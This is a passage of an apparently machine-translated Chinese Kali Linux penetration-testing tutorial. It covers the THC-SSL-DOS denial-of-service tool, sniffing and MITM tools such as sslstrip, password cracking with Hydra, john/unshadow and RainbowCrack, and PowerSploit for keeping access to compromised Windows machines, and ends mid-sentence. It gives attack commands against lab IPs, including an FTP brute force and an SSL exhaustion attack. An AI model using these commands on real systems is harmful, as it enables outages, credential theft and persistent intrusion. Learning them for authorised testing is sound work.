THC-SSL-DOS是一个验证SSL性能的工具。建立安全的 SSL 连接需要服务器上的处理能力比客户端多 15 倍。THCSSL-DOS 通过使服务器超载并将其从互联网上删除来利用这种不对称特性。

以下是命令 -

thc-ssl-dos victimIP httpsport –accept 

在这个例子中,它将是 -

thc-ssl-dos 192.168.1.1 443 –accept 

其输出如下 -

SSL 性能

SSL 错误

Kali Linux - 嗅探和欺骗

嗅探工具的基本概念就像窃听一样简单,Kali Linux 有一些用于此目的的流行工具。在本章中,我们将了解 Kali 中可用的嗅探和欺骗工具。

打嗝套件

Burpsuite 可以用作浏览器和网络服务器之间的嗅探工具,以查找网络应用程序使用的参数。

要打开 Burpsuite,请转到应用程序 → Web 应用程序分析 → burpsuite。

网络分析

为了设置嗅探,我们将 burpsuite 配置为代理。为此,请转到选项,如以下屏幕截图所示。选中如图所示的框。

在这种情况下,代理 IP 将为 127.0.0.1,端口为 8080。

代理服务器的IP

然后配置浏览器代理,即burpsuite机器的IP和端口。

配置浏览器

要开始拦截,请转到代理→拦截→单击“拦截已打开”。

继续在您想要查找用于测试漏洞的参数的网页上导航。

截距

在本例中,它是 IP 192.168.1.102 的 Metasploitable 机器

机器IP

转到“HTTP 历史记录”。在下面的屏幕截图中,红色箭头标记的线显示了最后一个请求。在 Raw 中,隐藏参数(例如会话 ID)和其他参数(例如用户名和密码)已用红色下划线表示。

请求参数

米特普罗西

mitmproxy是一个支持 SSL 的中间人 HTTP 代理。它提供了一个控制台界面,允许动态检查和编辑流量。

要打开它,请转到终端并输入“mitmproxy -parameter”,要获取命令帮助,请输入“mitmproxy –h”

米特代理

要启动 mitmproxy,请输入“mitmproxy –p portnumber”。在本例中,它是“mitmproxy –p 80”。

端口号

Wireshark

Wireshark 是最好的数据包分析器之一。它对帧级别的数据包进行深入分析。您可以从其官方网页获取有关 Wireshark 的更多信息:https ://www.wireshark.org/ 。在 Kali 中,可以使用以下路径找到它 - 应用程序→嗅探和欺骗→wireshark。

Wireshark

单击wireshark后,将打开以下GUI。

Wireshark图形用户界面

单击“开始”,将开始抓包,如下图所示。

抓包

安全带

sslstrip是一种 MITM 攻击,它强制受害者的浏览器通过 HTTP 以纯文本方式进行通信,并且代理会修改来自 HTTPS 服务器的内容。为此,sslstrip 会“剥离”https:// URL 并将其转换为 http:// URL。

要打开它,请转至应用程序 → 09-嗅探和欺骗 → 欺骗和 MITM → sslstrip。

欺骗

应用中间人

要进行设置,请写入将所有 80 端口通信转发到 8080。

港口通讯

然后,启动所需端口的sslstrip命令。

SSLtrip 命令

Kali Linux - 密码破解工具

在本章中,我们将了解Kali Linux中使用的重要密码破解工具。

九头蛇

Hydra是一个登录破解程序,支持多种协议攻击(Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、 HTTP(S)-HEAD、HTTP 代理、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle Listener、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin 、Rsh、SIP、SMB(NT)、SMTP、SMTP 枚举、SNMP v1+v2+v3、SOCKS5、SSH(v1 和 v2)、SSHKEY、Subversion、Teamspeak (TS2)、Telnet、VMware-Auth、VNC 和 XMPP) 。

要打开它,请转到应用程序 → 密码攻击 → 在线攻击 → Hydra。

九头蛇

它将打开终端控制台,如下面的屏幕截图所示。

打开终端

在这种情况下,我们将暴力破解metasploitable机器的FTP服务,其IP为192.168.1.101

暴力破解

我们在 Kali 中创建了一个扩展名为“lst”的单词列表,路径为usr\share\wordlist\metasploit

分享词汇表

命令如下 -

hydra -l /usr/share/wordlists/metasploit/user -P 
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V 

其中–V是尝试时的用户名和密码

九头蛇指挥部

如下图所示,找到用户名和密码为msfadmin:msfadmin

管理员密码

约翰尼

Johnny是 John the Ripper 密码破解工具的 GUI。一般用于弱密码。

要打开它,请转到应用程序 → 密码攻击 → johnny。

约翰尼

在这种情况下,我们将使用以下命令获取 Kali 机器的密码,并在桌面上创建一个文件。

桌面

单击“打开密码文件”→“确定”,所有文件将显示如下图所示。

打开文件

单击“开始攻击”。

开始攻击

攻击完成后,点击左侧面板中的“密码”,密码将变为无阴影。

无阴影

约翰

john是 Johnny GUI 的命令行版本。要启动它,请打开终端并输入“john”

消除阴影

如果取消密码隐藏,我们需要编写以下命令 -

root@kali:~# unshadow passwd shadow > unshadowed.txt 

彩虹裂纹

RainbowCrack 软件通过彩虹表查找来破解哈希值。彩虹表是存储在硬盘上的普通文件。一般来说,Rainbow 表可以在网上购买或者可以使用不同的工具进行编译。

要打开它,请转到应用程序→密码攻击→单击“rainbowcrack”。

彩虹裂纹

破解哈希密码的命令是 -

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQL字典

它是一个针对SQL Server的字典攻击工具,使用起来非常简单和基础。要打开它,请打开终端并输入“sqldict”。它将打开以下视图。

sql字典

在“目标 IP 服务器”下,输入保存 SQL 的服务器的 IP。在“目标帐户”下,输入用户名。然后加载带有密码的文件并单击“开始”直到完成。

哈希标识符

它是一种用于识别哈希类型的工具,意味着它们的用途。例如,如果我有一个 HASH,它可以告诉我它是 Linux 还是 Windows HASH。

哈希标识符

上面的屏幕显示它可以是 MD5 哈希值,并且似乎是域缓存凭据。

Kali Linux - 维护访问

在本章中,我们将看到 Kali 用来维持连接和访问被黑客攻击的机器(即使它再次连接和断开连接)的工具。

强力攻击

这是一个适用于 Windows 机器的工具。它在受害者机器上安装了 PowerShell。该工具可帮助黑客通过 PowerShell 连接受害者的计算机。

要打开它,请打开左侧的终端并键入以下命令进入 powersploit 文件夹 -

cd /usr/share/powersploit/ 

如果您输入“ls”,它将列出您在获得访问权限后可以下载并安装在受害者计算机中的所有 powersploit 工具。他们中的大多数都是根据他们的名字来解释名字的。

强力攻击

在受害者的计算机上下载此工具的一个简单方法是创建一个 Web 服务器,powersploit 工具允许使用以下命令轻松创建该服务器 -

python -m SimpleHTTPServer 

下载工具

之后,如果您输入:http://<Kali machine ip_address>:8000/ 以下